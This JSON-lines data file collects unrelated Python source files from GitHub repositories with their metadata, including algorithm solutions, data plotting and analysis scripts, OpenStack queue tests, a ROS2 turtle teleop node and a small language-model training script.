+{"seq_id":"71873108930","text":"\ndef solution(m, n, puddles):\n answer = 0\n arr = list([0] * (m+1) for _ in range(n+1))\n for x in range(1,n+1):\n for y in range(1,m+1):\n if x == 1 and y == 1:\n arr[x][y] = 1\n elif [y,x] not in puddles:\n arr[x][y] = arr[x-1][y] + arr[x][y-1]\n answer = arr[n][m] % 1000000007\n return answer\n\nsolution(4,3,[[2,2]])","repo_name":"youngmin940629/algorithm","sub_path":"python/2022_03/0310/프로그래머스_3-1.py","file_name":"프로그래머스_3-1.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"17436667112","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nlayers = {\"CONV\": [0, 3, 7, 10, 14, 17],\n \"DENSE\": [21, 24, 27]}\n\nkeys = list(layers.keys())\n\nfor item in keys:\n fig, ax = plt.subplots()\n for index, layer_index in enumerate(layers[item]):\n experiment_name = \"Layer_{}\".format(layer_index)\n directory = os.path.join('../results', experiment_name)\n\n df = pd.read_csv(os.path.join(directory, 'results.csv'), sep='\\t')\n df['Accuracy'] = 100 * df['Accuracy']\n df.plot(x='Pruning_percentage', y='Accuracy', ax=ax, label=\"{}_{}\".format(item, index + 1))\n\n # Pruning Percentage where accuracy is higher than no pruning\n higher_acc = df['Accuracy'] > df['Accuracy'][0]\n\n print(\"{:5}{} - Pruning Percentage: {}% Test Accuracy: {:.2f}%\".format(item, index + 1, df['Accuracy'][higher_acc].idxmax(), df['Accuracy'][higher_acc].max()))\n\n ax.set_xticks(range(0, 105, 10))\n ax.set_yticks(range(0, 95, 10))\n ax.set_xlabel(\"Percentage of Neurons Pruned\")\n ax.set_ylabel(\"Accuracy on CIFAR-10 test set\")\n ax.set_title(\"Pruning Percentage for {} Layers\".format(item))\n ax.grid(linewidth=0.25)\n\n plt.savefig('../results/{}.pdf'.format(item))\n","repo_name":"tarujg/keras-deep-compression","sub_path":"parameter-pruning/utils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"43"} +{"seq_id":"71276185090","text":"# 프로그래머스 - 디펜스 게임\n\nfrom heapq import heappush, heappop\n\ndef solution(n, k, enemy):\n if k >= len(enemy):\n return len(enemy)\n \n heap = []\n answer = 0\n 
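# seed the heap with the first k waves; with k skips available, they are all survivable\n    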
for i in range(k):\n        heappush(heap, enemy[i])\n        answer += 1\n    \n    while n > 0 and answer < len(enemy):\n        heappush(heap, enemy[answer])\n        min_round = heappop(heap)\n        if n >= min_round:\n            answer += 1\n            n -= min_round\n        else:\n            # cannot afford even the cheapest remaining wave: the run ends here\n            break\n    \n    return answer\n\n\nif __name__ == \"__main__\":\n    test_cases = [[7, 3, [4, 2, 4, 5, 3, 3, 1], 5],\n                  [2, 4, [3, 3, 3, 3], 4]]\n    \n    fail = False\n    for test_case in test_cases:\n        if solution(*test_case[:-1]) != test_case[-1]:\n            print(\"FAIL\")\n            fail = True\n            break\n\n    if not fail:\n        print(\"SUCCESS\")","repo_name":"dbsxodud-11/programming_daily","sub_path":"Data_Structures/Priority_Queue/programmers_디펜스_게임.py","file_name":"programmers_디펜스_게임.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"5663258032","text":"import numpy as np\n\n# x=np.sin(np.pi/2)\n#pi/180*degree_values\n# x=np.rad2deg(np.array([np.pi/2,np.pi/3,np.pi/4,np.pi/5,0]))\n# x=np.deg2rad(np.array([90,180,270,360]))\n# x=np.arcsin(1.0)\n# x=np.arcsin(np.array([1,-1,0.1]))\nbase=3\nperp=4\nx=np.hypot(base,perp)\nprint(x)\n","repo_name":"MetiKh2/NumPy-Tutorial","sub_path":"Ufunc_trigonometric.py","file_name":"Ufunc_trigonometric.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71805679171","text":"import numpy as np\n\nimport pyximport\npyximport.install(setup_args={'include_dirs': np.get_include()})\n\nfrom hippocampus.fastBVC import Boundary\nfrom hippocampus.geometry_utils import intersect_lines, subtended_angle_c, in_smallest_interval\n\n\nclass BVC(object):\n    \"\"\"Boundary Vector Cell. Parameters taken from Burgess et al.\n    \"\"\"\n\n    def __init__(self, pref_distance=None, pref_orientation=None):\n        self.beta = 1830\n        self.sigma_0 = 122\n        self.sigma_ang = 0.2\n        if pref_distance is None:\n            self.pref_distance = np.random.choice([81.0, 169.0, 265.0, 369.0, 482.5, 606.5])\n        else:\n            self.pref_distance = pref_distance\n        if pref_orientation is None:\n            self.pref_orientation = np.radians(np.random.choice(np.linspace(0,354, 60)))\n        else:\n            self.pref_orientation = pref_orientation\n        self.sigma_rad = (self.pref_distance / self.beta + 1) * self.sigma_0\n\n    def distance_to_nearest_boundary_py(self, pos, direction, env):\n        d = [np.inf]\n        subtended_angle = []\n        for b in env.boundaries:\n            v1 = b.p1 - pos\n            v2 = b.p2 - pos\n            a1 = np.arctan2(v1[1], v1[0]) % (2 * np.pi)\n            a2 = np.arctan2(v2[1], v2[0]) % (2 * np.pi)\n\n            if in_smallest_interval(direction, a1, a2):\n                d.append(b.distance_in_orientation(pos, direction))\n                subtended_angle.append(b.subtended_angle(np.array(pos, dtype=np.float64)))\n        return min(d), subtended_angle[d.index(min(d)) - 1]\n\n    def distance_to_nearest_boundary(self, pos, orientation, env):\n        idx = self.which_boundary(pos, orientation, env)\n        b = env.boundaries[idx]\n        d = b.distance_in_orientation(pos, orientation)\n        a = b.subtended_angle(pos)\n        return d, a\n\n    def which_boundary(self, pos, orientation, env):\n        for i in range(env.n_boundaries):\n            b = env.boundaries[i]\n            v1 = b.p1 - pos\n            v2 = b.p2 - pos\n            a1 = np.arctan2(v1[1], v1[0]) % (2 * np.pi)\n            a2 = np.arctan2(v2[1], v2[0]) % (2 * np.pi)\n            if in_smallest_interval(orientation, a1, a2):\n                return i\n        return False\n\n    def compute_activation_pixel(self, pos, env):\n        angles = np.linspace(0, 2 * np.pi, 400)[:-1]\n        n_angles = len(angles)\n        ds = np.empty(len(angles), dtype=np.float64)\n\n        for i in range(n_angles):\n            theta = angles[i]\n\n            # get distance and 
subtended angle\n d, subtended_angle = self.distance_to_nearest_boundary(pos, theta, env)\n f = self.calculate_activation(d, subtended_angle, theta)\n ds[i] = f\n return ds.sum()\n\n def compute_ratemap_grid(self, xs, ys, env):\n nx = len(xs)\n ny = len(ys)\n rate_map = np.zeros(nx, dtype=np.float64)\n\n for i, j in zip(range(nx), range(ny)):\n pos = np.array([xs[i], ys[j]], dtype=np.float64)\n activation = self.compute_activation_pixel(pos, env)\n rate_map[i] = activation\n return rate_map\n\n def calculate_activation(self, d, subtended_angle, theta):\n # calculate activation\n distance_term = np.exp(-(d - self.pref_distance) ** 2 / (2 * self.sigma_rad ** 2)) / np.sqrt(\n 2 * np.pi * self.sigma_rad ** 2)\n angle_term = np.exp(-(theta - self.pref_orientation) ** 2 / (2 * self.sigma_ang ** 2)) / np.sqrt(\n 2 * np.pi * self.sigma_ang ** 2)\n f = distance_term * angle_term * subtended_angle\n return f\n\n","repo_name":"bicanski/HBPcollab","sub_path":"Striatal_v_hippocampal_nav_v3/hippocampus/slowBVC.py","file_name":"slowBVC.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"14883397151","text":"import logging\n\nfrom six import moves\nfrom testtools import matchers\n\nfrom tempest.api.messaging import base\nfrom tempest.common.utils import data_utils\nfrom tempest import test\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass TestQueues(base.BaseMessagingTest):\n\n @test.attr(type='smoke')\n def test_create_queue(self):\n # Create Queue\n queue_name = data_utils.rand_name('test-')\n _, body = self.create_queue(queue_name)\n\n self.addCleanup(self.client.delete_queue, queue_name)\n\n self.assertEqual('', body)\n\n\nclass TestManageQueue(base.BaseMessagingTest):\n _interface = 'json'\n\n @classmethod\n def resource_setup(cls):\n super(TestManageQueue, cls).resource_setup()\n cls.queues = list()\n for _ in moves.xrange(5):\n queue_name = data_utils.rand_name('Queues-Test')\n cls.queues.append(queue_name)\n # Create Queue\n cls.client.create_queue(queue_name)\n\n @test.attr(type='smoke')\n def test_delete_queue(self):\n # Delete Queue\n queue_name = self.queues.pop()\n _, body = self.delete_queue(queue_name)\n self.assertEqual('', body)\n\n @test.attr(type='smoke')\n def test_check_queue_existence(self):\n # Checking Queue Existence\n for queue_name in self.queues:\n _, body = self.check_queue_exists(queue_name)\n self.assertEqual('', body)\n\n @test.attr(type='smoke')\n def test_check_queue_head(self):\n # Checking Queue Existence by calling HEAD\n for queue_name in self.queues:\n _, body = self.check_queue_exists_head(queue_name)\n self.assertEqual('', body)\n\n @test.attr(type='smoke')\n def test_list_queues(self):\n # Listing queues\n _, body = self.list_queues()\n self.assertEqual(len(body['queues']), len(self.queues))\n for item in body['queues']:\n self.assertIn(item['name'], self.queues)\n\n @test.attr(type='smoke')\n def test_get_queue_stats(self):\n # Retrieve random queue\n queue_name = self.queues[data_utils.rand_int_id(0,\n len(self.queues) - 1)]\n # Get Queue Stats for a newly created Queue\n _, body = self.get_queue_stats(queue_name)\n msgs = body['messages']\n for element in ('free', 'claimed', 'total'):\n self.assertEqual(0, msgs[element])\n for element in ('oldest', 'newest'):\n self.assertNotIn(element, msgs)\n\n @test.attr(type='smoke')\n def test_set_and_get_queue_metadata(self):\n # Retrieve random queue\n queue_name = self.queues[data_utils.rand_int_id(0,\n 
len(self.queues) - 1)]\n # Check the Queue has no metadata\n _, body = self.get_queue_metadata(queue_name)\n self.assertThat(body, matchers.HasLength(0))\n # Create metadata\n key3 = [0, 1, 2, 3, 4]\n key2 = data_utils.rand_name('value')\n req_body1 = dict()\n req_body1[data_utils.rand_name('key3')] = key3\n req_body1[data_utils.rand_name('key2')] = key2\n req_body = dict()\n req_body[data_utils.rand_name('key1')] = req_body1\n # Set Queue Metadata\n _, body = self.set_queue_metadata(queue_name, req_body)\n self.assertEqual('', body)\n # Get Queue Metadata\n _, body = self.get_queue_metadata(queue_name)\n self.assertThat(body, matchers.Equals(req_body))\n\n @classmethod\n def resource_cleanup(cls):\n for queue_name in cls.queues:\n cls.client.delete_queue(queue_name)\n super(TestManageQueue, cls).resource_cleanup()\n","repo_name":"codybum/OpenStackInAction","sub_path":"scripts/icehouse/opt/stack/tempest/tempest/api/messaging/test_queues.py","file_name":"test_queues.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"43"} +{"seq_id":"39701049323","text":"## let's look at some of pandas cleanup methods\n\nimport os\nimport csv\nimport numpy as np\nimport pandas as pd\n\n## did we ever make a json file out of our bp_conc \n## spreadsheet? dunno. \n\n## just read in from spreadsheet:\n\nBPC = pd.read_csv('../mining_data/BP_Conc_Intersect_g.csv')\nBP = pd.read_csv('../mining_data/BP_g.csv')\nC = pd.read_csv('../mining_data/Concessions_g.csv')\n\n\n## what are the goals? \n## a spreadsheet with concessions by territory, sorted by size\n## a spreadshhet of BPs affected by concessions, sorted by area affected\n\n## lotsa other stuff. But gotta be real in the goals\n\n## so for today? get the locations split out on both pandas, export as csvs\n## put them and the map of loscedros on the website\n\n## so back to the basics - how do we split this column into two?\n\nPROV = BPC['ubicacion'].apply(lambda x : x.split(';'))\n\n## or \n\nPROV = BPC['ubicacion'].str.split(';')\n\nPROV[0][0]\n\n## but to get at the elements of this list?\n\nPROV1 = [ a[0].split(':')[1].strip() for a in PROV ]\nPROV2 = [ a[1].split(':')[1].strip() for a in PROV ]\n\n## as long as the indices line up, we can do this:\nBPC['Prov'] = PROV1\nBPC['Cant'] = PROV2\n\n## repeat all that for the BP df:\n\n## not working#########\nPROV = BP['ubicacion'].str.split(';')\nPROV1 = [ a[0].split(':')[1].strip() for a in PROV ]\nPROV2 = [ a[1].split(':')[1].strip() for a in PROV ]\nBP['Prov'] = PROV1\nBP['Cant'] = PROV2\n## not working#########\n\n## aside, roo wants LC's number:\n\nBP = BP.set_index('nombre')\nBP.loc['LOS CEDROS']\nBP = BP.reset_index()\n\n## okay, how do we group the BP/concession chart by BP?\n\n## can we get a list of all affected BPs?\nnoms = BPC.nombre.unique()\n\n## have a feeling this would be a lot easier with a database\n## oh well, just spit this out. Set up dbs later\n\n##noms is our first column. 
we also want the BP code...\nBPcode = [ BP[BP.nombre == i ].cod_bosq_m.iloc[0] for i in noms ]\n\n########### area of each BP:#########\n\nBParea_Ha = [ BP[BP.nombre == i ].area_ha.iloc[0] for i in noms ]\n\n########### now how do we get the identity of concessions in each?#########\n\n## function to collect names of concessions:\ndef getconcIDs(nom):\n BPs = BPC.groupby('nombre')\n bb = BPs.get_group(nom)\n conc_ids = list(bb.nam)\n return(conc_ids)\n\n## so for each BP:\nconcIDs = [ getconcIDs(i) for i in noms ]\n\n## how can we convert our concession ids to strings,\n## join into a single cell of a spreadsheet?\n\n## a function to get rid of empty decimal of a concID if necessary:\ndef cleanzero(i): ## uses a float\n i = str(i)\n if float(i) % 1 == 0: ## if there is a decimal\n dec = i.find('.') ## find decimal\n zoop = i[:dec] ## remove\n else: zoop = str(i)\n return(zoop)\n\n## nest into another function, that can handle a list, and joins?\ndef cleanallzeros(lst): \n if type(lst) is list: ## if it's a list of numbers\n clz = [ cleanzero(str(j)) for j in lst ]\n clzs = \", \".join(clz)\n elif type(lst) is float: ## if its a scalar \n clzs = cleanzero(str(lst))\n return(clzs)\n\n## apply this to all of the lists in concIDs\nconcIDs = pd.Series(concIDs).apply(cleanallzeros)\n\n########### and for the combined areas of concessions?#########\n\n\ndef getconcArea(nom):\n BPs = BPC.groupby('nombre')\n bb = BPs.get_group(nom)\n concArea_Hai = sum(bb.area)/10000 ## convert to Ha\n return(concArea_Hai)\n\n## so for each BP:\nconcArea_Ha = [ getconcArea(i) for i in noms ]\n\n########### now calculate % underconcession:#########\n\nperConc = np.array(concArea_Ha) / np.array(BParea_Ha)\n\n####### province information for each BP #########\n\n## locations, province and canton\nBPub = [ list(BP[BP.nombre == i ].ubicacion)[0] for i in noms ]\n\nlen(BPub)\n\n## split it up:\n\nublist = pd.Series(BPub).str.split(';')\n\n## take out just the first elemnent of resulting lists\nBPprov = [ a[0].split(':')[1].strip() for a in ublist ]\n\n\n## did this work?\ndf = pd.concat([pd.Series(noms), \\\n pd.Series(BPcode), \\\n pd.Series(BPprov), \\\n pd.Series(concIDs), \\\n pd.Series(concArea_Ha), \\\n pd.Series(BParea_Ha), \\\n pd.Series(perConc), \\\n ], keys = [ \\\n 'noms', \\\n 'BPcode', \\\n 'BPprov', \\\n 'concIDs', \\\n 'concArea_Ha', \\\n 'BParea_Ha', \\\n 'perConc', \\\n ], axis = 1)\n\n## sanity checks\n## seems ok\n\ndf.to_csv('BP_percent_concessioned.csv')\n\n\n","repo_name":"danchurch/BPwebsite","sub_path":"scripts/BP_Concession_overlap/makeBPConcSpreadsheet.py","file_name":"makeBPConcSpreadsheet.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"69804917891","text":"#tab escaped charcter\ntabby_cat = \"\\tI'm tabbed in.\"\n#line break escaped charcter\npersian_cat = \"I'm split\\nona line.\"\n#escaped slash\nbackslash_cat = \"I'm \\\\ a \\\\ \\a cat.\"\n\n#making a bulleted list with tripple quotes\nfat_cat = '''\nI'll do a list:\n\\t* Cat food\n\\t* Fishies\n\\t* Catnip\\n\\t* Grass\n'''\n\nprint(tabby_cat)\nprint(persian_cat)\nprint(backslash_cat)\nprint(fat_cat)","repo_name":"tedstetzel/learn-python-the-hard-way","sub_path":"ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74843513409","text":"# vim: ai:sw=4:ts=4:sta:et:fo=croql\n# pylint: 
disable=missing-module-docstring,missing-class-docstring,too-few-public-methods\n# type: ignore\nfrom typing import Any, Dict, Generator, Optional\n\nimport pytest\n\nfrom tests import common\nfrom yaas_common import const\nfrom yaas_config import config, resolve_config\nfrom yaas_gcp import gcs\n\n\ndef _config(topic_to_pubsub_gcs: Optional[str] = None) -> config.Config:\n return common.TEST_CONFIG_LOCAL_JSON.clone(topic_to_pubsub_gcs=topic_to_pubsub_gcs)\n\n\nclass _MyBlob:\n def __init__(self, name: str, content: Optional[bytes] = None):\n self.name = name\n self._content = content\n self.called = {}\n\n def download_as_bytes(self) -> bytes:\n self.called[_MyBlob.download_as_bytes.__name__] = True\n return self._content\n\n\n@pytest.mark.parametrize(\n \"value,extra_topics\",\n [\n (_config(None), {}),\n (\n _config(\"gs://test-bucket/path/to/prefix\"),\n {\n \"extra-topic-1\": \"projects/test-project/topics/test-topic-1\",\n \"extra-topic-2\": \"projects/test-project/topics/test-topic-2\",\n },\n ),\n ],\n)\ndef test_consolidate_config_ok(monkeypatch, value: config.Config, extra_topics: Dict[str, str]):\n # Given\n called = _mock_list_objects(monkeypatch, extra_topics)\n # When\n result = resolve_config.consolidate_config(value)\n # Then\n _verify_unchanged(result, value)\n # Then: extra topics\n if extra_topics:\n _verify_list_called(called.get(resolve_config.gcs.list_objects.__name__), result)\n for topic, topic_id in extra_topics.items():\n assert result.topic_to_pubsub.get(topic) == topic_id\n else:\n assert not called\n\n\ndef _mock_list_objects(monkeypatch, extra_topics: Dict[str, str]) -> Optional[Dict[str, Any]]:\n called = {}\n\n def mocked_list_objects( # pylint: disable=unused-argument\n *,\n bucket_name: str,\n prefix: str,\n project: Optional[str] = None,\n ) -> Generator[_MyBlob, None, None]:\n nonlocal called, extra_topics\n called[resolve_config.gcs.list_objects.__name__] = locals()\n for topic, topic_id in extra_topics.items():\n yield _MyBlob(\n name=topic,\n content=bytes(topic_id.encode(const.ENCODING_UTF8) if isinstance(topic_id, str) else topic_id),\n )\n\n monkeypatch.setattr(\n resolve_config.gcs,\n resolve_config.gcs.list_objects.__name__,\n mocked_list_objects,\n )\n return called\n\n\ndef _verify_list_called(called, result):\n bucket_name, prefix = gcs.get_bucket_and_prefix_from_uri(result.topic_to_pubsub_gcs)\n assert isinstance(called, dict)\n assert called.get(\"bucket_name\") == bucket_name\n assert called.get(\"prefix\") == prefix\n\n\ndef _verify_unchanged(result, value):\n assert isinstance(result, config.Config)\n assert result.calendar_config == value.calendar_config\n assert result.cache_config == value.cache_config\n assert result.topic_to_pubsub_gcs == value.topic_to_pubsub_gcs\n assert result.retention_config == value.retention_config\n # Then: topic_to_pubsub\n for topic, topic_id in value.topic_to_pubsub.items():\n assert result.topic_to_pubsub.get(topic) == topic_id\n\n\ndef test_consolidate_config_nok(monkeypatch):\n # Given\n value = _config(\"gs://test-bucket/path/to/prefix\")\n extra_topics = {\n \"extra-topic-1\": \"projects/test-project/topics\",\n \"extra-topic-2\": bytes(123),\n }\n for topic, topic_id in value.topic_to_pubsub.items():\n extra_topics[topic] = f\"{topic_id}-not\"\n called = _mock_list_objects(monkeypatch, extra_topics)\n # When\n result = resolve_config.consolidate_config(value)\n # Then\n _verify_unchanged(result, value)\n _verify_list_called(called.get(resolve_config.gcs.list_objects.__name__), result)\n # Then: 
topic_to_pubsub\n    for topic, topic_id in extra_topics.items():\n        if topic in value.topic_to_pubsub:\n            assert result.topic_to_pubsub.get(topic) != topic_id\n        else:\n            assert topic not in result.topic_to_pubsub\n","repo_name":"fgka/py-yaas","sub_path":"code/core/tests/yaas_config/test_resolve_config.py","file_name":"test_resolve_config.py","file_ext":"py","file_size_in_byte":4131,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16506069682","text":"# Imports\nfrom datetime import datetime # For finding system's real time\nimport math\nimport os\nimport socket # For collecting the system hostname to be added to the conf file.\nimport sys # For reading command-line arguments and exiting program with exit code\nimport yaml # For loading config file\n\n\ndef format_output(data_str, addresses, connected_devices):\n    # Convert data string into list and trim off the last 7 irrelevant data points\n    csv_data = data_str.split(\",\")[:-7]\n\n    # Scan through the data to see if there's a match with known SDI-12 devices\n    for address in addresses:\n        for index in range(len(csv_data)):\n            if address == csv_data[index]:\n                # If a known SDI-12 address matches with an address in the data,\n                # overwrite the address with a common sensor name\n                csv_data[index] = connected_devices[csv_data[index]]\n\n    temp_kelvin = voltage_to_kelvin(float(csv_data[-1]))\n    csv_data.append(\"%0.2f\" % temp_kelvin)\n\n    # Return newly formatted data as a string\n    return \",\".join(csv_data)\n\n\ndef generate_filename():\n    date = datetime.now().strftime(\"%Y%m%d\")\n\n    filename = f\"sdi-12-{date}.csv\"\n    return filename\n\n\ndef load_config():\n    try:\n        with open('/config.yaml', 'r') as file:\n            config = yaml.safe_load(file)\n\n        return config\n\n    except FileNotFoundError:\n        print(\"[-] No config file found; please refer to the GitHub repo for a working example.\")\n        sys.exit(1)\n\n\ndef setup_csv(filepath, header):\n    file_exists = os.path.exists(filepath)\n\n    if file_exists:\n        # Open existing file\n        file = open(filepath, 'a')\n\n    else:\n        # Open the new file and write header\n        file = open(filepath, 'w')\n        file.write(header + '\\n')\n\n    return file\n\n\ndef voltage_to_kelvin(volts):\n    resistance = 100000 * (volts / (5-volts))\n    R0 = 100000\n    # B value from KOKISO 100k thermistor sales page\n    B = 3950\n\n    temp_kelvin = 1 / ( (1 / 298) + (1 / B) * ( math.log(resistance / R0) ) )\n\n    return temp_kelvin\n","repo_name":"DiscoverCCRI/sdi-12-data-collector","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36986640137","text":"import rclpy\nfrom rclpy.node import Node\nfrom rclpy.qos import QoSProfile\nfrom geometry_msgs.msg import Twist\nfrom my_py_pkg.get_char import GetChar\n\nmsg_how2 = '''\n---------------------------------------\n (forward)\n 'w'\n\n (ccw)'a' 's' 'd'(cw)\n (backward)\n---------------------------------------\ntype 'Ctrl-C' or 'Q' to quit program...\n---------------------------------------\n'''\n\nclass RemoteTurtle(Node):\n\n    def __init__(self):\n        super().__init__('remote_turtle')\n        qos_profile = QoSProfile(depth=10)\n        self.tw_pub = self.create_publisher(Twist, '/turtle1/cmd_vel', qos_profile)\n        \n    def publish_tw_msg(self, tw_msg):\n        # publish the received Twist message unchanged\n        self.tw_pub.publish(tw_msg)\n\n\ndef main(args=None):\n    rclpy.init(args=args)\n    node = RemoteTurtle()\n    
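# GetChar presumably reads a single keypress without waiting for Enter\n    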
kb_input = GetChar()\n tw = Twist()\n ch = ' '\n count_keyin = 0\n count_reset = 15\n\n try:\n print(msg_how2)\n\n while ch != 'Q':\n\n ch = kb_input.getch()\n\n if ch == 'w':\n tw.linear.x = 2.0; tw.angular.z = .0\n print(\": forward\" ); count_keyin = count_keyin + 1\n elif ch == 's':\n tw.linear.x = -2.0; tw.angular.z = .0\n print(\": backward\" ); count_keyin = count_keyin + 1\n elif ch == 'a':\n tw.linear.x = .0; tw.angular.z = 2.0\n print(\": turn left\" ); count_keyin = count_keyin + 1\n elif ch == 'd':\n tw.linear.x = .0; tw.angular.z = -2.0\n print(\": turn right\"); count_keyin = count_keyin + 1\n elif ch == 'Q' or ch == 'q':\n break\n else:\n pass\n\n node.publish_tw_msg(tw)\n\n count_keyin = count_keyin % count_reset\n if count_keyin == 0:\n print(msg_how2)\n\n except KeyboardInterrupt:\n node.get_logger().info('Keyboard Interrupt(SIGINT)')\n\n finally:\n node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"leeeju/ROS2_turtlebot3_project","sub_path":"my_py_pkg/my_py_pkg/script/remote_turtle.py","file_name":"remote_turtle.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"24715156161","text":"from simanneal import Annealer\nfrom restorationmodel import RestorationModel\nfrom ToolBox import *\nfrom joblib import Parallel, delayed\n\n\nimport numpy as np\nimport random\n\n\nclass SimAnnealInterface(Annealer):\n \"\"\"\n Interface to use simaneal package and its classes\n ...\n Attributes/Parameters\n ----------\n test : bool\n a variable to define if the model runs on test data or original data\n capacity_losses : dict\n this includes ???\n\n Methods/Functions\n -------\n\n \"\"\"\n\n def __init__(self, state, graph, od_graph, od_matrix, graph_damaged, damage, fdir):\n self.graph = graph\n self.od_graph = od_graph\n self.od_matrix = od_matrix\n self.graph_damaged = graph_damaged\n self.no_damage = damage[0]\n self.initial_damage = damage[1]\n self.fdir = fdir\n\n # Model parameters for indirect costs\n self.mu = np.array([0.94, 0.06])\n self.xi = np.array([23.02, 130.96])\n self.F_w = np.array([6.7, 33])/100\n self.nu = 1.88\n self.rho = np.array([14.39, 32.54])/100\n self.upsilon = 83.27 * 8\n self.day_factor = 9\n\n with open(self.fdir+'energy.txt', 'w') as f:\n f.write('Energy')\n\n self.restoration_types = [0, 1, 2]\n super(SimAnnealInterface, self).__init__(state, fdir=self.fdir) # important!\n\n def move(self):\n \"\"\"Swaps two object in the restoration schedual.\"\"\"\n a = random.randint(0, len(self.state) - 1)\n b = random.randint(0, len(self.state) - 1)\n self.state[a], self.state[b] = self.state[b], self.state[a]\n\n # change type of restoration for one state\n c = random.choice(self.restoration_types)\n self.state[a] = (self.state[a][0], c)\n\n def energy(self):\n \"\"\"Calculates the costs of the restoration.\"\"\"\n e = 0\n\n restoration = RestorationModel(self.graph_damaged)\n restoration.run(self.state)\n restoration_graphs = restoration.get_restoration_graphs()\n restoration_times = restoration.get_restoration_times()\n restoration_costs = restoration.get_restoration_costs()\n\n damaged = []\n damaged.append(get_delta(self.no_damage, self.initial_damage))\n\n sim_results = Parallel(n_jobs=4)(delayed(parallel_model)(\n graph, self.od_graph, self.od_matrix) for graph in restoration_graphs[:-1])\n for values in sim_results:\n damaged.append(get_delta(self.no_damage, values))\n\n for idx, values in enumerate(damaged):\n 
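# dt is the duration of this restoration stage (restoration_times holds cumulative completion times)\n            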
dt = restoration_times[idx] if idx == 0 else restoration_times[idx] - \\\n restoration_times[idx-1]\n e += sum(restoration_costs[idx]) + dt * (self.day_factor * values[2] * np.sum(self.mu*self.xi) +\n values[3] * np.sum(self.mu * (self.nu * self.F_w + self.rho)) + values[4] * self.upsilon)\n with open(self.fdir+'energy.csv', 'a') as f:\n f.write('\\n'+str(e))\n\n return e\n","repo_name":"Savizmoghtader/RestoProgram","sub_path":"SimAnneal_Interface.py","file_name":"SimAnneal_Interface.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15140015051","text":"import argparse\n\nimport torch\nfrom lightning.pytorch import Trainer\nfrom lightning.pytorch.callbacks import EarlyStopping\nfrom lightning.pytorch.loggers import TensorBoardLogger\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom models import GRU, LSTM, RNN, Bigram, Transformer\n\nlogger = TensorBoardLogger(\"logs\", name=\"language_models\")\n\nmodels = {\n \"bigram\": Bigram,\n \"rnn\": RNN,\n \"lstm\": LSTM,\n \"gru\": GRU,\n \"transformer\": Transformer,\n}\n\n\ndef create_tokenizer(corpus):\n tokens = set(corpus)\n token_to_idx = {token: idx for idx, token in enumerate(tokens)}\n idx_to_token = {idx: token for idx, token in enumerate(tokens)}\n return token_to_idx, idx_to_token\n\n\ndef encode_corpus(corpus, token_to_idx):\n return torch.tensor(\n [token_to_idx[token] for token in corpus], dtype=torch.long\n )\n\n\ndef split_data(data, val_size):\n split_idx = int(len(data) * (1 - val_size))\n return data[:split_idx], data[split_idx:]\n\n\nclass CorpusDataset(Dataset):\n def __init__(self, data, context=8):\n self.data = data\n self.context = context\n\n def __len__(self):\n return len(self.data) - self.context\n\n def __getitem__(self, idx):\n return (\n self.data[idx : idx + self.context],\n self.data[idx + 1 : idx + self.context + 1],\n )\n\n\nif __name__ == \"__main__\":\n # Parse command line arguments\n args = argparse.ArgumentParser()\n args.add_argument(\"--model\", type=str, default=\"rnn\")\n args.add_argument(\"--context\", type=int, default=16)\n args.add_argument(\"--batch_size\", type=int, default=512)\n args.add_argument(\"--max_epochs\", type=int, default=5)\n args.add_argument(\"--learning_rate\", type=float, default=1e-3)\n args.add_argument(\"--val_size\", type=float, default=0.1)\n args.add_argument(\"--corpus\", type=str, default=\"data/shakespeare.txt\")\n args = args.parse_args()\n\n # Read corpus from file\n with open(args.corpus) as file:\n corpus = file.read()\n\n # Create vocabulary index mapping\n token_to_idx, idx_to_token = create_tokenizer(corpus)\n vocab_size = len(token_to_idx)\n\n # Encode corpus\n data = encode_corpus(corpus, token_to_idx)\n\n # Split data into train and validation set\n train_data, val_data = split_data(data, args.val_size)\n train_loader = DataLoader(\n dataset=CorpusDataset(train_data, args.context),\n batch_size=args.batch_size,\n )\n val_loader = DataLoader(\n dataset=CorpusDataset(val_data, args.context),\n batch_size=args.batch_size,\n shuffle=False,\n )\n\n # Train model\n model = models[args.model](\n vocab_size=vocab_size,\n context=args.context,\n learning_rate=args.learning_rate,\n tokenizer=(token_to_idx, idx_to_token),\n )\n trainer = Trainer(\n max_epochs=args.max_epochs,\n callbacks=[EarlyStopping(\"val_loss\")],\n logger=logger,\n )\n trainer.fit(\n model=model,\n train_dataloaders=train_loader,\n val_dataloaders=val_loader,\n )\n\n # Save model 
